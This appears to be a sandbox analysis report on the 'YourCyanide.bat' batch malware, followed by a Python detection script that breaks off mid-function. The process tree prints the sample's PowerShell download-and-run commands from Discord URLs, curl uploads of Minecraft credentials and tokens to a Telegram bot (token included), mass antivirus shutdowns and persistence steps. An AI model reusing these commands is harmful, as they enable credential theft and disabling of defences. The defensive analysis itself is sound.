Analysis
- max time kernel: 491s
- max time network: 494s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 22-05-2022 23:26
- Static task: static1
- Behavioral task: behavioral1
  Sample: YourCyanide.bat
  Resource: win7-20220414-en
- Behavioral task: behavioral2
  Sample: YourCyanide.bat
  Resource: win10v2004-20220414-en
- Behavioral task: behavioral3
  Sample: YourCyanide.bat
  Resource: win11-20220223-en
General
- Target: YourCyanide.bat
- Size: 150KB
- MD5: fdd17cbaa7423d1c9ca1ffb376d30b36
- SHA1: 47986c795d7a2521408f4f63a6b068c054659bc7
- SHA256: 6d4eafaeac05daa575d551127bffc77e92fae88887c3168318fe50dc26b8d725
- SHA512: 3aa57c435f462bea43ba87d527603ceabedff24c1353e64dc9b6e2c89956d2216030030e14056095afb4db17eb44f6f33dbed95054d5852cd9a4eccb5d6088cf
Malware Config
- Extracted: https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe
- Extracted: https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe
- Extracted: C:\Users\Admin\Desktop\YcynNote.txt
  yourcyanide.help@gmail.com
Signatures
- suricata: ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (3 IoCs)
  Processes:
  - flow 6, pid 4080, powershell.exe
  - flow 25, pid 1520, powershell.exe
  - flow 32, pid 1152, powershell.exe
- Disables Task Manager via registry modification
- Downloads MZ/PE file
- Executes dropped EXE (2 IoCs)
  Processes:
  - pid 4532, NoKeyB.exe
  - pid 3344, GetToken.exe
- Modifies Windows Firewall (1 TTPs)
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes:
  - Key value queried: \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation (cmd.exe)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes:
  - Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  - Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_25967_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.bat" (reg.exe)
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes:
  - File opened (read-only) by cmd.exe: \??\G:, \??\I:, \??\K:, \??\P:, \??\R:, \??\Z:, \??\A:, \??\E:, \??\L:, \??\M:, \??\N:, \??\T:, \??\U:, \??\V:, \??\F:, \??\J:, \??\S:, \??\X:, \??\B:, \??\O:, \??\W:, \??\Y:, \??\H:, \??\Q:
- Drops file in Windows directory (2 IoCs)
  Processes:
  - File opened for modification: C:\Windows\win.ini (cmd.exe)
  - File opened for modification: C:\Windows\system.ini (cmd.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Enumerates processes with tasklist (1 TTPs, 1 IoCs)
- Modifies registry class (21 IoCs)
- NTFS ADS (2 IoCs)
  Processes:
  - File opened for modification: C:\Users\Admin\Documents\%c¼├XV:~30 (cmd.exe)
  - File opened for modification: C:\Users\Admin\Desktop\%c¼├XV:~23 (cmd.exe)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (23 IoCs)
- Suspicious use of AdjustPrivilegeToken (53 IoCs)
- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes:
  - pid 4532, NoKeyB.exe
- Suspicious use of SendNotifyMessage (1 IoCs)
  Processes:
  - pid 4532, NoKeyB.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
  - pid 4532, NoKeyB.exe
  - pid 1868, powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
- Views/modifies file attributes (1 TTPs, 1 IoCs)
Processes
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat"1⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat2⤵
- Views/modifies file attributes
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'NoKeyB.exe')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\NoKeyB.exeNoKeyB.exe2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_25967_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat /f2⤵
- Adds Run key to start application
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵
-
C:\Windows\system32\net.exenet stop srservice /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵
-
C:\Windows\system32\net.exenet stop MskService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y3⤵
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y3⤵
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵
-
C:\Windows\system32\net.exenet stop netsvcs2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵
-
C:\Windows\system32\net.exenet stop spoolnt2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K attk1usb.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K attk2usb.cmd2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\loveletter.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\mail.vbs"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K spreadusb.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K spreadusb.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe', 'GetToken.exe')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\Documents\apps.txt"  (tree level 2)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\GetToken.exe
GetToken.exe  (tree level 2)
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Webrequest https://ipv4.wtfismyip.com/text"  (tree level 2)
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "Get-ComputerInfo"  (tree level 2)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Get-ComputerInfo"  (tree level 2)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exe
tasklist  (tree level 2)
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\curl.exe
curl -s -v -F document=@"apps.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538  (tree level 2)
-
C:\Windows\system32\curl.exe
curl -s -v -F document=@"userdata.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538  (tree level 2)
-
C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_msa_credentials.bin" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538  (tree level 2)
-
C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_msa_credentials_microsoft_store.bin" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538  (tree level 2)
-
C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538  (tree level 2)
-
C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts_microsoft_store.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538  (tree level 2)
-
C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_product_state.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538  (tree level 2)
-
C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538  (tree level 2)
-
C:\Windows\system32\curl.exe
curl -s -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538  (tree level 2)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"  (tree level 2)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y  (tree level 1)
-
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SyGateService" /y  (tree level 1)
-
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc  (tree level 1)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc  (tree level 1)
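The tree above is the whole kill chain in command lines: host enumeration (installed apps, Get-ComputerInfo, tasklist), a public-IP lookup, a run of curl multipart uploads to the Telegram Bot API carrying the collected text files and the Minecraft launcher credential files, the note pushed to a printer with Out-Printer, and net1 stopping security services. The script below is an added detection example, not part of this sandbox report or of the sample: it scans process-creation records for exactly those behaviours and pulls out the indicators an analyst needs next (bot ID, chat_id, uploaded paths, stopped services). The event records are constructed from the command lines in the tree (the image/cmdline shape stands in for a Sysmon Event ID 1 or 4688 record); the tag names, the public-IP host list and the token redaction format are the example's own choices.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: command lines copied from the process tree above, wrapped
# in the minimal shape of a process-creation record (image + cmdline).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CURL = r"C:\Windows\system32\curl.exe"
NET1 = r"C:\Windows\system32\net1.exe"
TG = ("https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM"
      "/sendDocument?chat_id=-655682538")
SAMPLE_EVENTS = [
    {"image": PS, "cmdline": r'powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName | Format-Table >C:\Users\Admin\Documents\apps.txt"'},
    {"image": PS, "cmdline": 'powershell -command "Invoke-Webrequest https://ipv4.wtfismyip.com/text"'},
    {"image": PS, "cmdline": 'powershell -command "Get-ComputerInfo"'},
    {"image": r"C:\Windows\system32\tasklist.exe", "cmdline": "tasklist"},
    {"image": CURL, "cmdline": 'curl -s -v -F document=@"apps.txt" ' + TG},
    {"image": CURL, "cmdline": r'curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" ' + TG},
    {"image": CURL, "cmdline": 'curl -s -v -F document=@"Tokens.txt" ' + TG},
    {"image": PS, "cmdline": r'powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"'},
    {"image": NET1, "cmdline": r'C:\Windows\system32\net1 stop "norton AntiVirus Client" /y'},
    {"image": NET1, "cmdline": r'C:\Windows\system32\net1 stop "SyGateService" /y'},
]

# Telegram Bot API URL: the bot token (<bot_id>:<secret>) is part of the path,
# so a single command line leaks everything needed to report the bot.
TELEGRAM_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)")
CHAT_ID_RE = re.compile(r"[?&]chat_id=(?P<chat_id>-?\d+)")
# curl multipart upload: -F <field>=@<path>
FORM_FILE_RE = re.compile(r'-F\s+\w+=@"?(?P<path>[^"\s]+)"?')
# net/net1 stop <service> /y (the /y suppresses the confirmation prompt)
NET_STOP_RE = re.compile(r'\bnet1?(?:\.exe)?\s+stop\s+"?(?P<service>[^"]+?)"?\s+/y\b', re.IGNORECASE)
# Illustrative lists (assumption: extend them from your own telemetry).
PUBLIC_IP_HOSTS = ("wtfismyip.com", "api.ipify.org", "icanhazip.com", "ifconfig.me")
DISCOVERY_MARKERS = ("get-computerinfo", "tasklist", "currentversion\\uninstall")


def redact_token(token: str) -> str:
    """Keep enough of the secret to correlate reports without re-publishing it."""
    return token[:4] + "..." + token[-3:]


def parse_telegram_upload(cmdline: str) -> Optional[Dict[str, str]]:
    """Extract bot id, token, API method, chat_id and uploaded path from a curl line."""
    m = TELEGRAM_RE.search(cmdline)
    if m is None:
        return None
    chat = CHAT_ID_RE.search(cmdline)
    upload = FORM_FILE_RE.search(cmdline)
    return {
        "bot_id": m["bot_id"], "token": m["token"], "method": m["method"],
        "chat_id": chat["chat_id"] if chat else "",
        "path": upload["path"] if upload else "",
    }


def classify(event: Dict[str, str]) -> List[str]:
    """Return the behaviour tags an event triggers; an empty list means nothing matched."""
    cmd = event["cmdline"]
    low = cmd.lower()
    tags = []
    if TELEGRAM_RE.search(cmd):
        tags.append("c2:telegram-bot-api")
        if FORM_FILE_RE.search(cmd):
            tags.append("exfil:file-upload")
    if any(host in low for host in PUBLIC_IP_HOSTS):
        tags.append("discovery:public-ip")
    if any(marker in low for marker in DISCOVERY_MARKERS):
        tags.append("discovery:host-enum")
    if NET_STOP_RE.search(cmd):
        tags.append("defense-evasion:service-stop")
    if "out-printer" in low:
        tags.append("impact:ransom-note-print")
    return tags


def scan(events: List[Dict[str, str]]) -> Dict[str, object]:
    """Fold per-event tags into the indicators needed for blocking and takedown."""
    report = {"tagged_events": 0, "bots": set(), "chat_ids": set(),
              "exfiltrated": [], "stopped_services": [], "tags": []}
    for ev in events:
        tags = classify(ev)
        if not tags:
            continue
        report["tagged_events"] += 1
        report["tags"].extend(tags)
        up = parse_telegram_upload(ev["cmdline"])
        if up:
            report["bots"].add(up["bot_id"] + ":" + redact_token(up["token"]))
            report["chat_ids"].add(up["chat_id"])
            if up["path"]:
                report["exfiltrated"].append(up["path"])
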